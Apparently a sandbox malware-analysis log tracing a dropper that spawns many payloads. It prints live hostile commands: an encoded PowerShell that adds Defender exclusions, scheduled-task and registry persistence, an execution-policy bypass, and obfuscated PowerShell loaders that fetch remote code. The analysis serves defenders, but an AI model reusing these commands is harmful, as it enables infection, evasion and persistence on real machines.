                            Source: sel1.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: traf.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: sel1.exe.9.drStatic PE information: Section .text
                            Source: vapo.exe.9.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: vapo.exe.9.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: vapo.exe.9.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: vapo.exe.9.dr, Settings.csBase64 encoded string: 'o095NcIW51EDVcSNh+Y38TpMdH/g/9dmPerhoKasPWHsEEEKiMmgN8MRErI1n6QT'
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, Settings.csBase64 encoded string: 'o095NcIW51EDVcSNh+Y38TpMdH/g/9dmPerhoKasPWHsEEEKiMmgN8MRErI1n6QT'
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: ABC.exe.9.dr, -.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: ABC.exe.9.dr, -.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: vapo.exe.9.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: vapo.exe.9.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.mine.winEXE@85/134@21/57
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052D4767 GetLastError,FormatMessageA,16_2_052D4767
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_07711CF0 AdjustTokenPrivileges,24_2_07711CF0
                            Source: C:\Users\user\Downloads\haus\T.exeCode function: 24_2_07713118 AdjustTokenPrivileges,24_2_07713118
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_078A1CF0 AdjustTokenPrivileges,28_2_078A1CF0
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_078A3118 AdjustTokenPrivileges,28_2_078A3118
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05279118 GetDiskFreeSpaceA,16_2_05279118
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_00171918 CreateToolhelp32Snapshot,Process32First,lstrlen,Process32Next,CloseHandle,Sleep,15_2_00171918
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05291588 CoCreateInstance,16_2_05291588
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0527DD30 FindResourceA,LoadResource,FindResourceA,LoadResource,16_2_0527DD30
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,16_2_00453360
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,16_2_00453360
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\hausJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7240
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7552
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
                            Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\634B2A0CF6A9133C8B3CFA57D4D4BDDF83E743A7
                            Source: C:\Users\user\Downloads\haus\T.exeMutant created: \Sessions\1\BaseNamedObjects\WlO6Om8yfxIARVE4
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                            Source: C:\Users\user\Downloads\haus\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                            Source: C:\Users\user\Downloads\haus\vapo.exeMutant created: \Sessions\1\BaseNamedObjects\h5HhCg9MKR6vgFJb
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeMutant created: \Sessions\1\BaseNamedObjects\AdobeAcrobatReader
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs"
                            Source: wow.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\Downloads\haus\ABC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process Where ProcessID = 7204
                            Source: C:\Users\user\Downloads\haus\ABC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process.Handle=&quot;7204&quot;::GetOwner
                            Source: C:\Users\user\Downloads\haus\ABC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process Where ProcessID = 7440
                            Source: C:\Users\user\Downloads\haus\ABC.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process.Handle=&quot;7440&quot;::GetOwner
                            Source: C:\Users\user\Downloads\haus\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8144
                            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=988
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=988
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8004
                            Source: C:\Users\user\Desktop\wow.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: svchost.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                            Source: svchost.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                            Source: svchost.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                            Source: svchost.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                            Source: svchost.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                            Source: wow.exeVirustotal: Detection: 50%
                            Source: wow.exeReversingLabs: Detection: 34%
                            Source: C:\Users\user\Desktop\wow.exeFile read: C:\Users\user\Desktop\wow.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\wow.exe "C:\Users\user\Desktop\wow.exe"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\GameBarPresenceWriter.exe "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
                            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Desktop\wow.exe "C:\Users\user\Desktop\wow.exe"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\Loader.exe "C:\Users\user\Downloads\haus\Loader.exe"
                            Source: C:\Users\user\Downloads\haus\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\sel1.exe "C:\Users\user\Downloads\haus\sel1.exe"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\ABC.exe "C:\Users\user\Downloads\haus\ABC.exe"
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\traf.exe "C:\Users\user\Downloads\haus\traf.exe"
                            Source: C:\Users\user\Downloads\haus\sel1.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\amada2.exe "C:\Users\user\Downloads\haus\amada2.exe"
                            Source: C:\Users\user\Downloads\haus\amada2.exeProcess created: C:\ProgramData\1be588a5b7\gdsun.exe c:\programdata\1be588a5b7\gdsun.exe
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\vapo.exe "C:\Users\user\Downloads\haus\vapo.exe"
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7
                            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess created: C:\Users\user\Downloads\haus\ABC.exe C:\Users\user\Downloads\haus\ABC.exe
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\T.exe "C:\Users\user\Downloads\haus\T.exe"
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\conhost.exe "C:\Users\user\Downloads\haus\conhost.exe"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\WatchDog.exe "C:\Users\user\Downloads\haus\WatchDog.exe"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\Enalib.exe "C:\Users\user\Downloads\haus\Enalib.exe"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Rodham.vbs"
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Fuldautomatiseres.vbs"
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1036
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA=="
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Downloads\haus\WatchDog.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7552 -s 1472
                            Source: C:\Users\user\Downloads\haus\vapo.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\vapo.exe C:\Users\user\AppData\Roaming\vapo.exe
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Praefectorial61; function buxine($frugtavlens){$Millimicron=3;do{$Hestevognens+=$frugtavlens[$Millimicron];$Millimicron+=4} until(!$frugtavlens[$Millimicron])$Hestevognens}function Phonetist($Timebilletten){ .($procommemoration) ($Timebilletten)}$Bromphenol=buxine 'varnBelET eT.ru.RefW';$Bromphenol+=buxine 'SameLo bSkaCEroLUndigruE.rsn.ndT';$Bruttotonnagens=buxine ' trMShioAngzjoriArblTeblDykaWal/';$Hysses=buxine 'E rTUndlKnisRa 1 Es2';$Wispiness=' .t[ pn RrE ,ot lt.StrSRedESn RMagVSkaiSorCkeyEEltPMi,o GaIPhonDebTKr.mSrbaSt.NFeja S.GDelECytR Qu]Sha:Hyd:st SGoueJazClocuResrM sIEj,tA.lyEdipOb,r SiOSaltOliO B C HiON nl Ka= S.$UniHShoYRu sAlfS VaEDanS';$Bruttotonnagens+=buxine ' Fe5Unm.Su 0Fil Th(RenWFisi emnV,td NooMaaw losBl, UfoN coT Ku Gyp1,ro0 Sr.Bad0Sol;,ou Fu W VeiNonnHen6Shu4sch;S p dex nr6Cat4Foc;San Kryr U,vAfs:Cag1 nc3Ind4Trl.squ0,ou)Sur StyGgeneDiscSkok,vmomas/Sac2Ge 0 Ry1Swa0Ske0 ro1Led0Mil1 ft ecF bii Hor apeEksf HeoSvmxD t/Par1Re.3par4Par.Tu.0';$Procedurereglerne=buxine ' roUDiasKrbe w RVra- uaStoG StE Ban.jrt';$Isotomous222=buxine 'UdmhAt t ActUnlpAsysByg:lev/L,n/NonfFiliLivl FoeFrsd B,nTrk. BeeEnkuDei/ otlFormFurjThyMhae1LanIFoutSneiForFTilCSubHArrjuraYHasA H 4StrJAwaN faRT eBAnkYTraBTom3 Sm4Wes/ MuKSnraCapnIdeaSe r .oiPare lrG ne.genBrusTet.P.cq ,uxMond';$Raukle=buxine 'B,d>';$procommemoration=buxine ' V IFraET.aX';$Skiftnings='Teglvrksovn';$Sbredders='\Rten.Men';Phonetist (buxine ' Sc$.erg ,oLBanoRe.bUnaA,ral re:Spon TiO egn enOgenwA lnOpleR mrSem= eh$ A,e,erNHivvpre:CisAEklP FopAduDRe aB.lt dlaSta+Ban$RenSDykbBacr neD fd,urdStaeAutrU eS');Phonetist (buxine 'P e$OmvgmodlB loDkbBP raHreLMed: DifAalR VaaTott enrTa AP eeCinD B ESyslV.rS Ples,is KodU dA I GSenE ReNut =Nac$ForImins FooOvetspro S,MHemOCobUStosf.r2 Po2Pea2Aff.YonSCykpg,sLEugi DdT N (Unc$datrRaaAGr UHankTypLPowEG k)');Phonetist (buxine $Wispiness);$Isotomous222=$Fratraedelsesdagen[0];$sagnomspundent=(buxine 'C n$UneG raLAndOAmabSu,aSmlLObs:Up.D.eoEPreF ose FiNInteBepsskatPi.rHykA UntS aeKap= TrnMaxEPrewD s- rooMusbHykj UnesndCTret Lo ImpSU myLacSD wtViseHa.mFor.ung$U vBI drHouO Afm lP WahBu ESa NTiloMe.L');Phonetist ($sagnomspundent);Phonetist (buxine 'Sup$ etDCoue ymfMeseFornSp eFarsAfttLarrFleaUgetAcce R..Ru.He pe elaChrdEnfeUnsr MesArb[Dis$NutP arUndo wac N,e ErdtatuModr PoeL mrD aeAghgSuplBlae.murDe nLa e iv] T,=Bas$RenB Snr.onuStotS mtEksoSentinto Bin Conpr.aPolg Ene S.nFles');$Plectognathous=buxine 'Ank$ IrDIsoeskmfbule Agn O eBeas C tvarrW aaCiat O ePre.u,rD sooVinwN kn ylUdko SvaCryd LnFTkkiSpdlDemeBuk(Me.$Th IO.ksDetogrotAnloSupmAuto EgumonsSvi2 M 2 Pe2Fol,Mor$DriO I r,std omrFore eb.eleSuph ReaIntnHaad,enlOpfiPronHolgSo eGhonDom)';$Ordrebehandlingen=$nonowner;Phonetist (buxine 'Sor$M,agPr.lNonoOpubS ea,veL jo:AgrN Pui nfT axRBj,oU sp.ndH.ynY E T ubiPerCAmo= Na(BertRipELa SStrT.nb-S gPS laCo.tlevhTnk Lig$AfdoRygR oldDenrgrueD mBSy
                            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7240 -s 1288
                            Source: C:\Users\user\Downloads\haus\T.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j 